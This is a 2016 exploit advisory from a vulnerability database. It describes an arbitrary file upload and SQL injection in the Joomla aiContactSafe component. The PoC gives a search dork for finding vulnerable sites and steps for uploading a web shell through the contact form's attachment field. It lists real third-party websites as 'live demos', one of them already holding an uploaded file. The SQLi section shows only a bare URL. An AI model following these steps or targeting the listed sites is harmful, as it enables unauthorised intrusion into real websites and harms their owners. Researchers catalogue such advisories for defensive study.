Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability

2016.07.19
Credit: xBADGIRL21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_aicontactsafe # Software link : http://www.algisinfo.com/en/download/category/1-free-extensions.html # Vendor Homepage : http://www.algisinfo.com/ # version : 2.0.20 # Tested on: [ Windows] # skype:xbadgirl21 # Date: 2016/07/18 # video Proof : https://youtu.be/PdDmThHGVz8 ###################### # [+] FILE UPLOAD : ###################### ###################### # [+] DESCRIPTION : ###################### # [+] aiContactSafe is An AJAX driven component to place a contact form anywhere on your web page # [+] with any number of custom fields of different types, including attachments. # [+] and an Shell Upload and SQLi has been Detected in this component ###################### # [+] PoC : ###################### # 1.- SELECT A WEBSITE FROM THE DORK ABOVE # 2.- http://localhost/site/index.php?option=com_aicontactsafe # 3.- check this Directory if you have Access to it : media/aicontactsafe/attachments # 4.- Just Upload your Shell or Txt or Image to Upload Field # 5.- Shell Directory : media/aicontactsafe/attachments/[RANDOME_NUM]Evi!l.php or the extension uploaded # Ex : http://malmoskyttegille.se/media/aicontactsafe/attachments/x_415.txt ###################### # [+] Live Demo: ###################### # http://malmoskyttegille.se/index.php?option=com_aicontactsafe ###################### # [+] SQL injection: ###################### # PoC : # http://www.site.com/index.php?option=com_aicontactsafe&field=1 # AdminPanel : # http://www.site.com/administrator ###################### # [+] Live Demo: ###################### # http://www.esbrasil.net/portal/index.php?option=com_aicontactsafe&field=1 # http://www.rustyspic-a-part.com/index.php?option=com_aicontactsafe&field=1 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/PdDmThHGVz8


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top